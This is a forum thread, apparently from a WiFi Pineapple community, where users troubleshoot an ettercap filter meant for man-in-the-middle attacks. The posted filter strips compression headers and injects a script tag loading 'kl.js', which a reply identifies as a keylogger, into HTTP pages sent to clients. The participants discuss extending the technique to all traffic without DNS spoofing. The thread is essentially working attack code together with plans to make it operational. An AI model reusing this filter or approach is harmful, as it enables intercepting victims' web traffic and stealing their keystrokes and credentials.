Jump to content

Ettercap Not Replacing


Vulture
 Share

Recommended Posts

Anyone here try using ettercap filters on the pineapple itself and not via a plugged in PC?

Ettercap appears to be working quite well except that my filter doesn't actually replace anything into the data stream.

Here is pretty much the most generic filter:

if (ip.proto == TCP && ip.dst != '172.16.42.44' && tcp.dst == 80 || tcp.dst == 8080) {

if (search(DATA.data, "Accept-Encoding")) {

replace("Accept-Encoding", "Accept-Nothing!");

}

}

if (ip.proto == TCP && ip.dst != '172.16.42.44' && tcp.src == 80 || tcp.src == 8080) {

if (search(DATA.data, "<head>")){

replace("<head>","<head><script type="text/javascript" src="http://172.16.42.1/kl.js"></script>");

msg("iframe injected after <head>\n");

}

if (search(DATA.data, "<HEAD>")){

replace("<HEAD>","<HEAD><script type="text/javascript" src="http://172.16.42.1/kl.js"></SCRIPT>");

msg("iframe injected after <HEAD>\n");

}

}

The msgs are being triggered, but the stream sent to the client contains none of the replaced data. Also, I noticed when you enable ettercap you must issue the "echo "1" > /proc/sys/net/ipv4/ip_forward" command for ICS to still be enabled.

I have tried the following adapters: wlan0, br-lan, 3g-wan2 (Internet)

Command I am running: ettercap -T -i 3g-wan2 -q -F test.ef

Link to comment
Share on other sites

I can't be of any help for the moment but I will investigate some stuff in the same direction.

Let me guess, kl.js means keylogger :P In that case, this thread could interest you.

Whenever one of us finds a solution with ettercap which works, he can post to the forum :)

Edited by Whistle Master
Link to comment
Share on other sites

I can't be of any help for the moment but I will investigate some stuff in the same direction.

Let me guess, kl.js means keylogger :P In that case, this thread could interest you.

Whenever one of us finds a solution which works, he can post to the forum :)

Whistle Master,

I am aware of your project and was hoping to work on an enhancement to it, based off of what Darren posted. My plan is to get this to work globally without the need for the templates or DNSspoof however that requires that I am able to manipulate the data that is sent to the client without totally replacing the domain. Your project has inspired my alteration, and I was combing through the module last night, if what I am doing doesn't work I will probably just shift gears and create a bunch of templates for your module.

Link to comment
Share on other sites

Whistle Master,

I am aware of your project and was hoping to work on an enhancement to it, based off of what Darren posted. My plan is to get this to work globally without the need for the templates or DNSspoof however that requires that I am able to manipulate the data that is sent to the client without totally replacing the domain. Your project has inspired my alteration, and I was combing through the module last night, if what I am doing doesn't work I will probably just shift gears and create a bunch of templates for your module.

Darren's comment also got my attention. I'm also working on a new version of the module to get off dnsspoof and use ettercap which will be great as we would not need templates any more :)

Keep me posted if you manage to make ettercap working!

Link to comment
Share on other sites

  • 1 year later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...